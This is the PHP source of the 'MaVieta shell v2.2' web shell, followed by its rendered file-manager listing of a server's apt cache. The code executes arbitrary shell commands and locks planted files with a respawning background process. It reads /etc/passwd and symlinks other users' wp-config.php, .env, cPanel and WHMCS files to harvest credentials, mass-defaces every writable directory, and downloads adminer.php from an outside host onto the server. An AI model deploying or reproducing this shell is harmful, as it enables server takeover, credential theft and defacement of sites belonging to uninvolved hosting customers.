    echo "<table class='directory-listing-table'><td>";
    echo '<br><form method="post"><center>
    <div class="input-group" style="width:600px;">
    <span class="input-group-text mb-1">Command :</span>
     <input type="text" class="form-control" name="komen" id="comandnya" value="'.$_POST['komen'].'" placeholder="uname -a" required>
    <button type="submit" name="comandeks" value="execute" class="btn btn-outline-light mb-1">>></button></div></form><br><center>';
    if (isset($_POST['comandeks'])) {
        ekse($_POST['komen'], $serlok);
    }
    echo "</center></td></table><br></center>";
    exit();
} elseif ($_REQUEST[net('about')] == "opet") {
    echo "<table class='directory-listing-table'><thead><td><div style='font-family: Bungee Outline;font-size:24px;'>
    <img class='crot' src='https://i.pinimg.com/564x/84/0e/4c/840e4c57fab2ba6279b377ae8dc333d3.jpg'/> Priv shell uwu edition</div><hr>
    <br> - MaVieta shell v2.2 <br> - Created by MaVieta</td></thead></table>"; exit();
} elseif ($_REQUEST[net('lokfile')] == "opet") {
    echo "<table class='directory-listing-table'><td>
    <h5><i class='fa fa-lock' style='color:#1A9DD2;'></i> Lock file<font class='MaVieta-text' style='font-size:12px;'><i> Linux</i></font></h5><hr style='color:#04FBFF;'>
    <center><form method='post'>
    <div class='input-group' style='width:300px;'>
    <span class='input-group-text mb-2'>Filename :</span>
    <input type='text' name='pile' class='form-control mb-2' placeholder='file.php'/></div><br>
    <button type='sumbit' class='btn btn-outline-light' style='width:120px;' name='submit'>Submit</button> 
    <a href='?path=".$serlok."&".net('tool')."=opet' class='btn btn-outline-light' style='width:120px;'>Back</a></form><br></td></table>";
    if (isset($_POST['submit'])) {
        if (empty($_POST['pile'])) {
            echo "<br><table class='directory-listing-table' style='border-color:orange;'><td><font color='orange'><center>The File field is required</center></font></td></table>";
        } else {
        $filez = $_POST['pile'];
        $tempe = "/tmp";
        if (file_exists($tempe.'/'.md5($serlok. $filez.'-xMaVieta').MaVieta_ex($filez).'xhand.Lock') && file_exists($tempe . '/'.MaVieta_ex($filez).'-xopet')) {
            cmd('rm -rf '.$tempe.'/'.md5($serlok. $filez.'-xopet').MaVieta_ex($filez).'xMaVieta.Lock', $serlok);
            cmd('rm -rf '.$tempe.'/'.md5($serlok. $filez.'-xMaVieta').MaVieta_ex($filez).'xhand.Lock', $serlok);
            }
            cmd("cp $filez ".$tempe."/".md5($serlok. $filez.'-xopet').MaVieta_ex($filez).'xMaVieta.Lock', $serlok);
            @chmod($filez, 0444);
            $content = '<?php
    $tmp = "/tmp";
    $fileperm = MaVieta_perm("'.$filez.'");
    MaVieta_cmd("chmod 444 '.$filez.'");
    while (True) {
        if (!file_exists("'.$filez.'")) {
            $var = base64_encode(file_get_contents($tmp . "/'.md5($serlok. $filez.'-xopet').MaVieta_ex($filez).'xMaVieta.Lock"));
            FiLe_pUt_ConTentS("'.$filez.'", base64_decode($var));
        }
        if ($fileperm != "0444"){
            MaVieta_cmd("chmod 444 '.$filez.'");
        }
    }
    function MaVieta_cmd($value)
    {
        if (function_exists("system")) {
            sYsTem($value);
        } else if (function_exists("shell_exec")) {
            return ShEll_eXeC($value);
        } else if (function_exists("exec")) {
            return ExEc($value);
        } else if (function_exists("passthru")) {
            return pAsSThRu($value);
        }
    }
    function MaVieta_perm($filez){
        return substr(sprintf("%o", fileperms($filez)), -4);
    }';
    $content = file_put_contents($tempe. "/" .md5($serlok. $filez.'-xMaVieta'). MaVieta_ex($filez).'xhand.Lock', $content);
    if ($content) {
        echo "<table class='directory-listing-table' style='border-color:lime;'><td>Locked => <font color='lime'>$filez</font></td></table>";
        cmd('php '. $tempe . '/' .md5($serlok. $filez.'-xMaVieta').MaVieta_ex($filez).'"xhand.Lock" > /dev/null 2>/dev/null &', $serlok);
    } else {
        echo "<table class='directory-listing-table' style='border-color:red;'><td><font color='red'><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> Can't lock $filez</font></td></table>";
            }
        }
    }exit();
} elseif ($_GET[net('resetcp')] == "opet") {
echo "<table class='directory-listing-table'><td>
<h5>Coming Soon</h5><hr></td></table><br>";exit();
} elseif ($_GET[net('hashiden')] == "opet") {
 echo "<table class='directory-listing-table'><td>
<h5>Hash Identifier</h5>Identify and detect unknown hashes using this tool.<hr>
<form method='POST'>
<div class='input-group' style='width:650px;'>
<span class='input-group-text mb-2'>Your hash :</span>
<input type='text' name='hash' class='form-control mb-2' placeholder='write here'></div><br>
<button type='submit' name='submit' class='btn btn-outline-light'>Submit & identify</button>
 <a href='?path=".$serlok."&".net('tool')."=opet' class='btn btn-outline-light'>Back</a></form></td></table><br>";
if (isset($_POST['submit'])) {
    if (empty($_POST['hash'])) {
        echo "<table class='directory-listing-table' style='border-color:orange;'><td><font color='orange'><center><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> The Hashes field is required</font></center></td></table>";
    } else {
function identify($hash) {
$algorithms = [
'<font color="lime">MD5' => '/^[a-f0-9]{32}$/i',
'<font color="lime">SHA1' => '/^[a-f0-9]{40}$/i',
'<font color="lime">SHA224, Keccak-224' => '/^[a-f0-9]{56}$/i',
'<font color="lime">SHA256' => '/^[a-f0-9]{64}$/i',
'<font color="lime">SHA512' => '/^[a-f0-9]{128}$/i',
'<font color="lime">Bcrypt, Blowfish(Unix)' => '/^\$2y\$[0-9]{2}\$[A-Za-z0-9\.\/]{53}$/',
'<font color="lime">Argon2i' => '/^\$argon2i\$v=\d+\$m=\d+,t=\d+,p=\d+\$[A-Za-z0-9\/+]{43,}\$[A-Za-z0-9\/+]{43,}$/',
'<font color="lime">Argon2id' => '/^\$argon2id\$v=\d+\$m=\d+,t=\d+,p=\d+\$[A-Za-z0-9\/+]{43,}\$[A-Za-z0-9\/+]{43,}$/'];
    foreach ($algorithms as $name => $pattern) {
        if (preg_match($pattern, $hash)) {
            return $name;
        }
    }
    return '<font color="red">Could not identify / Tidak dapat mengidentifikasi</font>';
}
$hashes = [$_POST['hash']];
echo "<table class='directory-listing-table'><td>";
foreach ($hashes as $hash) {
    echo "
    Hash : <font color='lime'>$hash\n</font>";
    echo "<br> Algorithms : " .identify($hash). "\n\n</font></td></table>";
            }
        }
    } exit();
} elseif ($_GET[net('grab_config')] == "opet") {
@ini_set('max_execution_time',0); 
@ini_set('display_errors', 0); 
@ini_set('file_uploads',1);
echo '<table class="directory-listing-table"><thead><td>
<center>Config Grabber<br><br><form method="POST"><textarea cols="100" name="passwd"  rows="25">'; 
$uSr=file("/etc/passwd"); 
foreach($uSr as $usrr) { 
$str=explode(":",$usrr); echo $str[0]."\n"; } 
echo'</textarea><br>
<input type="hidden" class="input" name="folfig" value="MaVietacfg"/><br>
<select class="form-select form-select-sm" aria-label=".form-select-lg example" style="width:150px;">
<option>select menu</option>
<option title="type txt" value=".txt">.txt</option>
<option title="type php" value=".php">.php</option>
<option title="type shtml" value=".shtml">.shtml</option>
<option title="type ini" value=".ini">.ini</option>
<option title="type html" value=".html">.html</option></select><br>
<input name="conf" style="width:100px;" class="btn btn-outline-light" value="submit" type="submit">
</td></thead></table></form></center><br>';
} if(isset($_POST['conf'])) {
$v = "var";
$folfig = $_POST['folfig']; $type = $_POST['type'];
@mkdir($folfig, 0755); 
@chdir($folfig);
$htaccess="
Options Indexes FollowSymLinks
\nDirectoryIndex .my.cnf
\nAddType txt .php
\nAddType txt .my.cnf
\nAddType txt .accesshash
\nAddHandler txt .php
\nAddHandler txt .cnf
\nAddHandler txt .accesshash
";
file_put_contents(".htaccess",$htaccess,FILE_APPEND);
$passwd=explode("\n",$_POST["passwd"]);
foreach($passwd as $pwd){ $user=trim($pwd);
@symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vBulletin1.txt');
@symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-vBulletin3.txt');
@symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'-vBulletin4.txt');
@symlink('/home/'.$user.'/public_html/config.php',$user.'-Phpbb1.txt');
@symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-Wp1.txt');
@symlink('/home/'.$user.'/htdocs/wp-config.php',$user.'-Wp-htdocs.txt');
@symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-Wp2.txt');
@symlink('/home/'.$user.'/public_html/web/wp-config.php',$user.'-Wp3.txt');
@symlink('/home1/'.$user.'/public_html/wp-config.php',$user.'-WpHm1.txt');
@symlink('/home2/'.$user.'/public_html/wp-config.php',$user.'-WpHm2.txt');
@symlink('/home3/'.$user.'/public_html/wp-config.php',$user.'-WpHm3.txt');
@symlink('/var/www/html/wp-config.php',$v.'-wp1.txt');
@symlink('/home/'.$user.'/public_html/.env',$user.'-Laravel1.txt');
@symlink('/home/'.$user.'/public_html/web/.env',$user.'-Laravel2.txt');
@symlink('/home/'.$user.'/public_html/public/.env',$user.'-Laravel3.txt');
@symlink('/var/www/html/.env',$v.'-LaravelV.txt');
@symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla1.txt');
@symlink('/home/'.$user.'/public_html/html/configuration.php',$user.'-Joomla2.txt');
@symlink('/home/'.$user.'/public_html/web/configuration.php',$user.'-Joomla3.txt');
@symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-Whm1.txt');
@symlink('/home/'.$user.'/public_html/whmc/configuration.php',$user.'-Whm2.txt');
@symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-Whm3.txt');
@symlink('/home/'.$user.'/public_html/client/configuration.php',$user.'-Whm4.txt');
@symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-Whm5.txt');
@symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'-Whm6.txt');
@symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.'-Whm7.txt');
@symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-Whm8.txt');
@symlink('/home/'.$user.'/public_html/order/configuration.php',$user.'-Whm9.txt');
@symlink('/home/'.$user.'/public_html/app/etc/local.xml',$user.'-Magento.txt');
@symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
@symlink('/home/'.$user.'/public_html/application/config/database.php',$user.'-CodeIgniter.txt');
@symlink('/home/'.$user.'/public_html/web/application/config/database.php',$user.'-CodeIgniterH.txt');
@symlink('/home1/'.$user.'/public_html/application/config/database.php',$user.'-CodeIgniter1.txt');
@symlink('/home2/'.$user.'/public_html/application/config/database.php',$user.'-CodeIgniter2.txt');
@symlink('/home3/'.$user.'/public_html/application/config/database.php',$user.'-CodeIgniter3.txt');
@symlink('/home/'.$user.'/.my.cnf',$user.'-cpanel.txt');
@symlink('/home/'.$user.'/.accesshash',$user.'-whm.txt');
@symlink('/home/'.$user.'/public_html/admin/config.php',$user.'-opencart.txt');
@symlink('/home/'.$user.'/public_html/app/etc/local.xml',$user.'-mangento.txt');
echo '<table class="directory-listing-table"><thead><td><center>Done => <a href='.$folfig.' target="_blank" class="button">Click Here</a></center></td></thead></table><br>';
    }exit();
} elseif ($_REQUEST[net('scanshell')] == "opet") {
    echo "<center><table class='directory-listing-table'><td>
    <form method='post'>
    <h5><i class='fa-solid fa-newspaper'></i> Backdoors Scanning</font></h5><hr>
    *note : Jika resultnya kosong berarti tidak ditemukan/ekstensi nya di isi dengan benar
    <div class='input-group mb-2' style='width:350px;'>
    <span class='input-group-text mb-1'>Extension :</span>
    <input type='text' class='form-control' name='ext' placeholder='ex : php, phar, shtml, phtml'></div>
    <div class='input-group mb-2' style='width:550px;'>
    <span class='input-group-text mb-1'>Directory :</span>
    <input type='text' class='form-control' name='peth' value='$serlok'></div>
    <button type='submit' class='btn btn-outline-light' name='submit' style='width:120px;'>Submit</button> 
    <a href='?path=".$serlok."&".net('tool')."=opet' class='btn btn-outline-light' style='width:120px;'>Back</a>
    </form></td></table><br>";
    if(isset($_POST['submit'])) {
        function scan_directory($dir) {
    $ext = $_POST['ext'];
    $rdi = new RecursiveDirectoryIterator($dir);
    echo "<table class='directory-listing-table'><td>";
    foreach (new RecursiveIteratorIterator($rdi) as $filename => $file) {
        if (pathinfo($filename, PATHINFO_EXTENSION) == $ext) {
            $content = file_get_contents($filename);
            if (preg_match('/(eval|base64_decode|str_rot13|mass_deface|addrdp|@exec|@passthru|@chmod|#exec|deface|command|{IFS}|shell_exec|SERVER_SOFTWARE|wget|@get_current_user|@getmygid|htmlspecialchars_decode|B374k|@getmygid|hacked|exe_root|xploit|Disable_Function|backdoor|backconnect|gecko-select|php_uname|Alfa-Team|ALFA_DATA|MARIJUANA|blackeagleteam|IndoSec|getHostByName|alfashell|php-obfuscator|gacor|slot-gacor|slot88|featureShell|move_upload_file|upload)\s*\(/i', $content)) {
                echo "<pre>Found : <font color='lime'>$filename</font> => <font color='orange'>Detected</font> <a href='?viewfile=$filename&path=".$_GET['path']."/$rdi' target='_blank'><i>view</i></a></pre>\n";
            }
        }
    } 
} 
$cek = $_POST['peth'];
if ($cek) {
scan_directory($cek);
echo "<font color='aqua'>Scan Completed..!!</font></td></table><br>";
        } 
    } exit();
} elseif ($_REQUEST[net('massdef')] == "opet") {
    function sabun_massal($serlok,$namafile,$isi_script) {
        if(is_writable($serlok)) {
            $dira = scandir($serlok);
            foreach($dira as $dirb) {
                $dirc = "$serlok/$dirb";
                $lokasi = $dirc.'/'.$namafile;
                if($dirb === '.') {
                    file_put_contents($lokasi, $isi_script);
                } elseif($dirb === '..') {
                    file_put_contents($lokasi, $isi_script);
                } else {
                    if(is_dir($dirc)) {
                        if(is_writable($dirc)) {
                            echo "[<font color=lime>DONE</font>] $serlok<br>";
                            file_put_contents($lokasi, $isi_script);
                            $idx = sabun_massal($dirc,$namafile,$isi_script);
                        }
                    }
                }
            }
        }
    }
    function sabun_biasa($serlok,$namafile,$isi_script) {
        if(is_writable($serlok)) {
            $dira = scandir($serlok);
            foreach($dira as $dirb) {
                $dirc = "$serlok/$dirb";
                $lokasi = $dirc.'/'.$namafile;
                if($dirb === '.') {
                    file_put_contents($lokasi, $isi_script);
                } elseif($dirb === '..') {
                    file_put_contents($lokasi, $isi_script);
                } else {
                    if(is_dir($dirc)) {
                        if(is_writable($dirc)) {
                            echo " http://$dirb/$namafile<br>";
                            file_put_contents($lokasi, $isi_script);
                        }
                    }
                }
            }
        }
    }
    if($_POST['start']) {
        if($_POST['tipe_sabun'] == 'mahal') {
            echo "<table class='directory-listing-table'><td>";
            sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
            echo "</td></table></div>";
        } elseif($_POST['tipe_sabun'] == 'murah') {
            echo "<table class='directory-listing-table'><td>";
            sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
            echo "</td></table></div>";
        }
    } else {
    echo "<table class='directory-listing-table'><td>";
    echo "<form method='post'>
    <div class='form-check-inline mb-2'>
    <input type='radio' name='tipe_sabun' id='biasa' class='form-check-input' value='murah' checked>
    <label class='form-check-label' for='inlineRadio1'>Biasa</label></div>
    <div class='form-check form-check-inline'>
    <input type='radio' name='tipe_sabun' class='form-check-input' value='mahal'>
    <label class='form-check-label' for='inlineRadio2'>Massal</label></div>
    <div class='input-group' style='width:430px;'>
    <span class='input-group-text mb-1'>Files :</span>
    <input type='text' name='d_file' class='form-control' placeholder='file.html'></div>
    <div class='input-group' style='width:750px;'>
    <span class='input-group-text mb-1'>Path :</span>
    <input type='text' name='d_dir' class='form-control' value='$serlok'></div>
    <textarea name='script' class='form-control' style='width: 750px; height: 300px;' placeholder='Hello Word!'></textarea><br>
    <button type='submit' name='start' value='start' class='btn btn-outline-light' style='width: 300px;'>submit</button> 
    <a href='?path=$serlok&".net('tool')."=opet' class='btn btn-outline-light' style='width: 300px;'>Back</a>
    </form></td></table>";
    }exit();
} elseif ($_REQUEST[net('ner')] == "opet") {
    function crot($url){
        $MaVieta = curl_init($url);
        curl_setopt($MaVieta, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($MaVieta, CURLOPT_CONNECTTIMEOUT, 10);
        curl_setopt($MaVieta, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($MaVieta, CURLOPT_HEADER, 0);
        return curl_exec($MaVieta);
        curl_close($MaVieta);
    } 
        echo "<table class='directory-listing-table'><td><h5><i class='fa fa-database' aria-hidden='true'></i> Adminer<font class='MaVieta-text' style='font-size:12px;'><i> v4.8.1</i></font></h5><hr><center>
    <form method='POST'>
    <div class='input-group' style='width:300px;'>
    <span class='input-group-text mb-2'>Filename :</span>
    <input type='text' placeholder='adminer.php' class='form-control mb-2' name='miner'></div><br>
        <button type='sumbit' class='btn btn-outline-light' name='gass' style='width:120px;'>Submit</button> 
        <a href='?path=".$serlok."&".net('tool')."=opet' class='btn btn-outline-light' style='width:120px;'>Back</a></form></td></table><br>";
    if(isset($_POST['gass'])) {
        if (empty($_POST['miner'])) {
            echo "<table class='directory-listing-table' style='border-color:orange;'><td><font color='orange'><center><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> Input field is required<center></font></td></table>";
        } else {
    $check = $serlok."/".$_POST['miner'];
    $result = str_replace($_SERVER['DOCUMENT_ROOT'], $web."",$check);
    $content = crot('https://raw.githubusercontent.com/bellpwn/netxploit/main/adminer.php');
    $open = fopen($check, 'w');
    fwrite($open, $content);
    fclose($open);
    if (file_exists($check)) {
        echo "<table class='directory-listing-table' style='border-color:lime;'><td>Adminer<font color='lime'> : $check </font><br>Link : <a href='".$result."' target='_blank'><i>$result</i></a></td></table>";
    } else {
        echo "<table class='directory-listing-table' style='border-color:red;'><td><font color='red'><center><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> Failed to create adminer..!!</center></font></td></table>";
                    }
                }
        }exit();
} elseif ($_REQUEST[net('buatfile')] == "opet") {
    function createfile(){
        $pat = $_GET['path'];
        $nama_file = $_POST['nama_file'];
        $isi_file = $_POST['isi_file'];
        $handle = fopen("$pat/$nama_file", 'w');
        $files = $_GET['path']."/".$nama_file;
        $asu = str_replace($_SERVER['DOCUMENT_ROOT'], $web. "", $files);
        if (fwrite($handle, $isi_file)) {
            echo '<table class="directory-listing-table" style="border-color:lime;"><td>Created => <font color="lime">'.$pat.'/'.$nama_file.'<br></font>Link : <a href="'.$asu.'" target="_blank"><font color="aqua"><i>Click here</i></a></font></td></table>';
        } else {
            echo '<table class="directory-listing-table" style="border-color:red;"><td><font color=red><i class="fa fa-exclamation-triangle" aria-hidden="true"></i> Failed to create file..!!</font></script></td></table>';
        }
    } if(!isset($_POST['bikin'])) {
        echo "<center><table class='directory-listing-table'><td width='12%''>
    <form method='POST'>
        <input type='text' value='file.php' placeholder='Nama File' style='width: 525px;' name='nama_file' autocomplete='off'><br><br>
        <textarea name='isi_file' rows='20' cols='100' placeholder='Hello World!'></textarea><br>
        <button type='sumbit' class='btn btn-outline-light' style='width:200px; height:36px;' height:30;' name='bikin'>CREATE</button> 
        <a href='?path=".$serlok."' class='btn btn-outline-light'>Back</a><br>
    </form></center>";
        } else {
            createfile();
        }exit();
} elseif ($_GET[net('buatfolder')] == "opet") {
      function createDirectory() {
        if (empty($_POST['add'])) {
        echo '<table class="directory-listing-table" style="border-color:orange;"><td><font color="orange">Folder field is required</font> [<a href="?path='.$_GET['path'].'&'.net("buatfolder").'=opet"><i class="fa-solid fa-folder-plus" aria-hidden="true"></i>Create again</a>]</td></table>';
        } else {
        $add = $_POST["add"];
        $MaVieta = mkdir($_GET['path']."/".$add);
        if ($MaVieta == true) {
            echo "<table class='directory-listing-table' style='border-color:lime;'><td>Created =><font color=lime> ".$_GET['path']."/</font><font color='orange'>$add</font><br>
            <a href='?path=".$_GET['path']."/$add'><u>Click Here</u></a></td></table>";
    } else {
            echo "<table class='directory-listing-table' style='border-color:red;'><td><font color=red><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> Failed to create folder : $add</font></td></table>";
                }
        }
}
        if (!isset($_POST['submit'])) {
            echo '<table class="directory-listing-table"><td>
        <form action="" method = "POST"><h5><i class="fa fa-folder-plus"></i> Create Folder</h5><hr><center>
        <div style="width:300px;">
         <input type="text" class="form-control" placeholder="Folder Name" name="add" id="add"/><br></div>
        <button type="submit" class="btn btn-outline-light" name="submit" value="Create directory" style="width:120px;">Create</button> 
        <a href="?path='.$serlok.'" class="btn btn-outline-light" style="width:120px;">Back</a><br><br></form></td></table>';
        } else {
            createDirectory();
        }exit();
} elseif ($_REQUEST[net('info')] == "opet") {
    echo "<table class='directory-listing-table' align='center'>
    <div id='content'><tr><td>";
    echo "Server : <font color=orang>".$_SERVER['HTTP_HOST']."</font><br>";
    echo "Server IP : <font color=orange>".ipserv()."</font>  <br> Your IP : <font color=orange>".$_SERVER['REMOTE_ADDR']."</font><br>";
    echo "Web Server : <font color='orange'>".$_SERVER['SERVER_SOFTWARE']."</font><br>";
    echo "System : <font color='orange'>".php_uname()."</font><br>";
    echo "User : <font color='orange'>".@get_current_user()." </font>( <font color='orange'>".@getmyuid()."</font>)<br>";
    echo "PHP Version : <font color='orange'>".@phpversion()." </font>=><font color='orange'> ".php_sapi_name()."</font><br>";
    echo "</tr></td><tr><td>Disable Function : ".$disf."</font>";
    echo "</div></tr></td><tr><td>";
    echo "<hr>Orecle : ";
if (function_exists('oci_connect')) {
        echo "<font color=lime>ON</font>";
} else {
    echo "<font color=red>OFF</font>";

    echo " | SSH2 : ";
}

if (function_exists('ssh2_connect')) {
    echo "<font color=lime>ON</font>";
} else {
    echo "<font color=red>OFF</font>";

    echo " | MySQL : ";
}
if (function_exists("mysql_connect")) {
    echo "<font color=lime>ON</font>";
} else {
    echo "<font color=red>OFF</font>";
}
echo "  | cURL : ";
if (function_exists("curl_init")) {
    echo "<font color=lime>ON</font>";
} else {
    echo "<font color=red>OFF</font>";
}
echo "  | WGET : ";
if (file_exists("/usr/bin/wget")) {
    echo "<font color=lime>ON</font>";
} else {
    echo "<font color=red>OFF</font>";
}
echo "  | Perl : ";
if (file_exists("/usr/bin/perl")) {
    echo "<font color=lime>ON</font>";
} else {
    echo "<font color=red>OFF</font>";
}
echo "  | Python : ";
if (file_exists("/usr/bin/python2")) {
    echo "<font color=lime>ON</font>";
} else {
    echo "<font color=red>OFF</font>";
}
$pkexec = (@shell_exec("pkexec --version")) ? "<font color='lime'>ON</font>" : "<font color='red'>OFF</font>";
    echo " | PKEXEC : $pkexec<br><br>";
    echo "</tr></td></table><br>";
    exit();

}


if (!is_readable($serlok)) {
    die("<table class='directory-listing-table'><thead><td><center><font color=orange>This directory is unreadable :(</font></center></td></thead></table>");
}

echo '<table class="table table-dark table-hover" style="box-shadow: 0 0 20px black;width:90%;border-left:1px solid #40BECC;border-right:1px solid #40BECC;border-bottom:1px solid #40BECC;--bs-border-radius:80rem;" align="center">
<thead style="--bs-table-bg:#0D97A5;--bs-table-color:#000;"><tr>
<th><center>Name</center></th>
<th><center>Size</center></th>
<th><center>Last Modified</center></th>
<th><center>Owner</center></th>
<th><center>Permissions</center></th>
<th><center>Actions</center></th>
</tr></thead><center>';
$scd = "\163\143"."\141\156\144"."\151\162";
if(is_readable($serlok)){
            $fetch=$scd($serlok);
            $serlokbos=array();
            $filez=array();
            foreach($fetch as $fols){
                if($fols=='.'||$fols=='..'){
                    continue;
                }
                    $MaVietas=$serlok.'/'.$fols;
                    if(is_dir($MaVietas)){
                        array_push($serlokbos,$fols);
                    }elseif(is_file($MaVietas)){
                        array_push($filez,$fols);
                    }
                }
            }
foreach($serlokbos as $dir){
    echo "<tr>
    <td><i class='fa fa-folder' style='color: #FAA625'></i> <a href=\"?path=".$serlok."/".$dir."\">".$dir."</a></td>
    <td><center>Dir</center></td>
    <td><center>".filedate($serlok."/".$dir)."</center></td>
    <td>".owner($serlok."/".$dir)."</td>
    <td><center>";
    if(is_writable($serlok."/".$dir)) echo '<font color="lime">';
    elseif(!is_readable($serlok."/".$dir)) echo '<font color="red">';
    echo statusnya($serlok."/".$dir);
    if(is_writable($serlok."/".$dir) || !is_readable($serlok."/".$dir)) echo '</font>';

    echo "</center></td>
    <td><center><form method=\"POST\" action=\"?pilihan&path=$serlok\">
    <div class='btn-group me-2' role='group' aria-label='First group'>
    <button type='submit' class='btn btn-outline-secondary badge-action-rename' name='pilih' value='gantinama'>
    <i class='fa fa-pencil' style='color: #fff'></i></button>
    <button type='submit' class='btn btn-outline-secondary badge-action-chmod' name='pilih' value='chmodf'><i class='fa fa-gear' style='color: #06D2D5'></i></button>
    <button type='submit' class='btn btn-outline-secondary badge-action-tanggal' name='pilih' value='chdatef'><i class='fa fa-calendar' style='color: #5654F5'></i></button>
    <button type='submit' class='btn btn-outline-secondary badge-action-delete' name='pilih' value='hapus'><i class='fa fa-trash' style='color: #E53A3A'></i></button></div>
    <input type=\"hidden\" name=\"type\" value=\"dir\">
    <input type=\"hidden\" name=\"name\" value=\"$dir\">
    <input type=\"hidden\" name=\"path\" value=\"$serlok/$dir\">
    </form></center></td>
    </tr>";
}

foreach($filez as $file) {
    if(!is_file("$serlok/$file")) continue;
        $size = filesize("$serlok/$file")/1024;
        $size = round($size,3);
        if($size >= 1024){
        $size = '<font color="aqua">'.round($size/1024,2).'</font> MB';
    } else {
        $size = '<font color="#E6F01C">'.$size.'</font> KB';
    }
echo "<tr>
<td>".cekfile($serlok."/".$file)."
<a href=\"?viewfile=".$serlok."/$file&path=".$serlok."\">$file</a></td>
<td><center>".$size."</center></td>
<td><center>".filedate($serlok."/".$file)."</center></td>
<td>".owner($serlok."/".$file)."</td>
<td><center>";
if(is_writable("$serlok/$file")) echo '<font color="lime">';
elseif(!is_readable("$serlok/$file")) echo '<font color="red">';
echo statusnya("$serlok/$file");
if(is_writable("$serlok/$file") || !is_readable("$serlok/$file")) echo '</font>';
echo "</center></td><td><center>
<form method='post' action='?pilihan&path=$serlok'>
<div class='btn-group' role='group' aria-label='First group'>";
echo gazz($file);
echo "</div><input type=\"hidden\" name=\"type\" value=\"file\">
<input type=\"hidden\" name=\"name\" value=\"$file\">
<input type=\"hidden\" name=\"path\" value=\"$serlok/$file\">
</form></center></td></tr>";
}
echo '</tr></td></table></table>';
author();

function statusnya($file){
$izin = substr(sprintf('%o', fileperms($file)), -4);
return $izin;
}
?>
</body>
</html>
1#@!#!123s

: var / cache / apt / archives / 

Name
Size
Last Modified
Owner
Permissions
Actions
partial
Dir
December 23 2025 10:42:00
_apt
0700
accountsservice_22.07.5-2ubuntu1.5_amd64.deb
68.342 KB
March 11 2024 9:04:28
root
0644
accountsservice_23.13.9-2ubuntu6_amd64.deb
69.459 KB
April 04 2024 1:29:46
root
0644
acpid_1%3a2.0.34-1ubuntu2_amd64.deb
35.662 KB
April 09 2024 12:11:05
root
0644
adduser_3.137ubuntu1_all.deb
98.508 KB
July 12 2023 4:09:14
root
0644
amd64-microcode_3.20191218.1ubuntu2.2_amd64.deb
67.43 KB
August 30 2023 8:33:26
root
0644
amd64-microcode_3.20250311.1ubuntu0.24.04.1_amd64.deb
283.463 KB
June 09 2025 10:51:29
root
0644
apache2-bin_2.4.52-1ubuntu4.16_amd64.deb
1.29 MB
August 14 2025 12:28:55
root
0644
apache2-bin_2.4.58-1ubuntu8.8_amd64.deb
1.27 MB
August 14 2025 12:29:07
root
0644
apache2-data_2.4.52-1ubuntu4.16_all.deb
160.98 KB
August 14 2025 12:28:53
root
0644
apache2-data_2.4.58-1ubuntu8.8_all.deb
159.439 KB
August 14 2025 12:29:06
root
0644
apache2-utils_2.4.52-1ubuntu4.16_amd64.deb
87.217 KB
August 14 2025 12:28:55
root
0644
apache2-utils_2.4.58-1ubuntu8.8_amd64.deb
95.383 KB
August 14 2025 12:29:07
root
0644
apache2_2.4.52-1ubuntu4.16_amd64.deb
95.602 KB
August 14 2025 12:28:55
root
0644
apache2_2.4.58-1ubuntu8.8_amd64.deb
88.129 KB
August 14 2025 12:29:07
root
0644
apparmor_3.0.4-2ubuntu2.3build2_amd64.deb
581.207 KB
September 04 2024 8:45:32
root
0644
apparmor_4.0.1really4.0.1-0ubuntu0.24.04.4_amd64.deb
622.521 KB
March 27 2025 1:36:25
root
0644
appstream_1.0.2-1build6_amd64.deb
67.729 KB
April 08 2024 11:20:58
root
0644
apt-transport-https_2.4.12_all.deb
1.475 KB
February 15 2024 10:47:29
root
0644
apt-transport-https_2.4.14_all.deb
1.475 KB
March 29 2025 5:52:29
root
0644
apt-transport-https_2.8.3_all.deb
3.877 KB
March 29 2025 5:52:34
root
0644
apt-utils_2.4.12_amd64.deb
205.691 KB
February 15 2024 10:47:29
root
0644
apt-utils_2.4.14_amd64.deb
205.803 KB
March 29 2025 5:52:29
root
0644
apt-utils_2.8.3_amd64.deb
210.928 KB
March 29 2025 5:52:34
root
0644
apt_2.4.12_amd64.deb
1.3 MB
February 15 2024 10:47:29
root
0644
apt_2.4.14_amd64.deb
1.3 MB
March 29 2025 5:52:29
root
0644
apt_2.8.3_amd64.deb
1.31 MB
March 29 2025 5:52:34
root
0644
augeas-lenses_1.13.0-1_all.deb
313.064 KB
December 25 2021 1:29:05
root
0644
autoconf_2.71-3_all.deb
331.002 KB
January 15 2023 7:44:27
root
0644
automake_1%3a1.16.5-1.3ubuntu1_all.deb
545.09 KB
February 02 2024 7:21:25
root
0644
autopoint_0.21-14ubuntu2_all.deb
412.012 KB
April 09 2024 1:03:22
root
0644
base-files_12ubuntu4.6_amd64.deb
61.004 KB
February 15 2024 8:30:10
root
0644
base-files_13ubuntu10.3_amd64.deb
71.502 KB
August 02 2025 3:33:06
root
0644
base-passwd_3.6.3build1_amd64.deb
49.863 KB
April 09 2024 12:11:00
root
0644
bash-completion_1%3a2.11-8_all.deb
175.641 KB
October 26 2023 11:45:35
root
0644
bash_5.1-6ubuntu1.1_amd64.deb
750.631 KB
March 18 2024 9:35:52
root
0644
bash_5.2.21-2ubuntu4_amd64.deb
775.475 KB
March 31 2024 5:07:43
root
0644
bind9-dnsutils_1%3a9.18.28-0ubuntu0.22.04.1_amd64.deb
153.648 KB
